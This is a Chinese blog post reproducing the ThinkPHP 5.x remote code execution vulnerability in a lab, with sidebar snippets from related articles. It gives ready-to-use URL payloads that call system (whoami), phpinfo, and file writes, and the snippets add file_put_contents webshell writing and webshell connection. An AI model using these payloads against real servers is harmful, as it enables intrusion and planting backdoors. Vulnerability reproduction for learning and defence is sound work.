thinkphp漏洞再现

已于 2025-03-24 21:16:55 修改
阅读量285 收藏 4
点赞数 7
文章标签: 安全
于 2025-03-24 18:32:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_64470109/article/details/146482924
版权

Thinkphp5x远程命令执行及getshell

1、开环境

2、使用工具攻击

开启工具

输入地址,点击漏洞检测

存在漏洞之后,选择漏洞,执行命令

3、也可以执行远程命令

执行命令

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "<?php phpinfo();?>" >>1.php

复现Thinkphp5 5.0.22/5.1.29远程代码执行漏洞
NLXHBM的博客
04-16 3087
1.使用以下payload获取phpinfo: /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1 2.构造要执行的payload,获取网站目录文件: /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&
thinkphp漏洞复现
zzf011900的博客
04-02 1575
thinkphp 远程命令执行漏洞php的一个开发框架,5.0.23及以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用request类任意方法,构造payload,导致远程命令执行。浏览器访问:http://192.168.59.10:8080/index.php?Rce 恶意构迷的语句在服务器(系统)上执行,从而达到黑客控制服务器的目的。浏览器访问:http://192.168.59.10:8080/函数:一串按照顺序和一定逻辑执行的代码。MSF实现直接获取权限原理。
ThinkPHP漏洞利用
weixin_41038905的博客
10-11 1586
漏洞标志 影响版本 ThinkPHP 5.0.x ~ 5.0.23 ThinkPHP 5.1.x ~ 5.1.31 漏洞利用 先查看版本号。在网址上随意输入一个不存在的模块 地址: 可以看到,thinkphp 版本为 5.0.20 查看信息 漏洞利用 大致原理: 漏洞程序未对控制器进行过滤,导致攻击者可以通过引入\符号来调用任意类方法。 详情参考:https://www.cnblogs.com/backlion/p/10106676.html 初步利用代码如下: index.php?s..
远程执行RCE漏洞,命令基础学习
goddemon
06-08 718
thinkpad 5.0 rce漏洞 payload与在get中写一句话木马的方法 执行payload //① /index.php/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 //② 写一句话木马 //①利用post写 ?s=index/think\app/invokefunction&function=call_user_func
ThinkPHP5x 远程代码执行漏洞(CNVD-2018-24942)复现
yzl_007的博客
08-04 1591
ThinkPHP5x 远程代码执行漏洞(CNVD-2018-24942)复现 影响范围 ThinkPHP 5.0.全版本 5.0.13~5.0.19的,这些版本默认情况下config中的app_debug配置项为false,需开启才能存在此漏洞漏洞复现 远程代码执行 直接get请求即可 ?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=pwd pw
ThinkPHP5RCE漏洞复现
飞雪 SecurityBlog
06-16 361
Payload:/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
thinkphp漏洞检测工具
06-06
ThinkPHP漏洞检测工具详解》 ThinkPHP是中国最流行的PHP框架之一,因其强大的功能和易用性深受开发者喜爱。然而,任何软件系统都可能存在安全漏洞ThinkPHP也不例外。为了保障Web应用的安全,开发者和安全专家们...
thinkphp漏洞图形化综合利用工具
05-23
Thinkphp(GUI)漏洞综合利用工具,支持各版本TP漏洞检测,命令执行,getshell。 (如果感觉对您有帮助,感觉不错的话,请您给个大大的支持) JFormDesigner可视化编写,没有javafx可视化好用(建议学javafx)。 检测不...
thinkphp 一键漏洞检测
12-09
然而,如同所有软件一样,ThinkPHP也有可能存在安全漏洞,这些漏洞可能被恶意用户利用,对网站造成严重威胁。"thinkphp 一键漏洞检测"工具正是为了解决这个问题而设计的。 该工具适用于ThinkPHP框架的多个版本,从V...
thinkPHP漏洞检测
07-18
thinkPHP漏洞检测
ThinkPHP5--rce远程代码执行
m0_74402888的博客
04-30 1265
ThinkPHP5版本中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞
四、【漏洞复现ThinkPHP5.X存在远程代码执行漏洞 (thinkphp 代码执行 CNVD-2018-24942)
weixin_52351575的博客
09-20 509
漏洞是因为框架对传入的路由参数过滤不严格,导致攻击者可以操作非预期的控制器类来远程执行代码。进一步分析发现,某些ThinkPHP版本不受已公开的POC的影响,这是由于该POC缺乏完备性考虑。由于这段请求中的参数值包含了目录遍历和反斜杠,可能存在安全风险,因此需要进行安全性分析和防护措施。根据参数的值可以推测这是一个针对ThinkPHP框架的请求,其中​。​函数是一个PHP内置的函数,用于执行系统命令。这段请求是一个GET请求,请求的URL路径是​。这段请求的目的是调用​。​​,查询参数包括​。
ThinkPHP 系列漏洞_thinkphp漏洞,网络安全开发面试准备
m0_61330806的博客
04-08 1070
??????5.0.x :?s=index/think\config/get&name=database.username # 获取配置信息?s=index/\think\Lang/load&file=…/…/test.jpg # 包含任意文件?s=index/\think\Config/load&file=…/…/t.php # 包含任意.php文件?
tp5 代码执行代码审计
最新发布
usingnstd的博客
08-12 424
tp5代码执行漏洞复现
ThinkPHP_3.1.3 SQL注入漏洞复现
weixin_44611282的博客
05-22 9049
首先在网上下载对应的压缩包。 漏洞位于ThinkPHP/Lib/Core/Model.class.php 文件的parseSql函数 将这一条修复语句注释后开始一步步复现ThinkPHP目录下创建app文件夹后创建index.php 访问相应页面,显示这个则说明成功。 成功后app文件夹下会生成工程文件 然后开始配置数据库(在app/conf/config.php下配置) <?php return array( //'配置项'=>'配置值' // 添加数据库配置信息 'DB_TYPE
Thinkphp 2.x、3.0-3.1版代码执行漏洞分析复现
qq_34788994的博客
06-07 1908
转载自 文章目录 闲扯 影响版本 原理分析 漏洞复现 闲扯 学习代码执行的审计时,遇到了双引号的一些迷惑,搜资料的时候发现了这个漏洞,顺便分析复现一哈。 影响版本 2.x、3.0-3.1 原理分析 关键代码: $depr = '\/'; $paths = explode($depr,trim($_SERVER['PATH_INFO'],'/')); $res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$v
常见框架漏洞(合集)
qq_66105152的博客
08-07 1334
直接拼接将url中的system替换为phpinfo,whoami替换为-1,则会显示出phpinfo();的执行结果,这说明这个页面也存在远程代码执行漏洞尝试获取shell,利用他的远程命令执行漏洞,输出一个一句话木马到1.php文件中,构造url如下,其中$_POST前加反斜杠是因为该网站会对其进行转义,\可以防止被转义直接在IP后面加上/1.php访问,成功后用蚁剑连接。
thinkphp 5-rce版本漏洞复现(超详细版)
热门推荐
精品博客,你值得一看~
08-06 1万+
s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=加你要写入的文件内容url编码。(3)还可以将php代码写入文件, 此处我们写一个phpinfo。(1)在url输出关于 PHP 配置的信息。说明存在远程命令执行漏洞!ip a #获取自己的本机 ip。(4)查看shell.php内容。直接访问 ip+端口。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值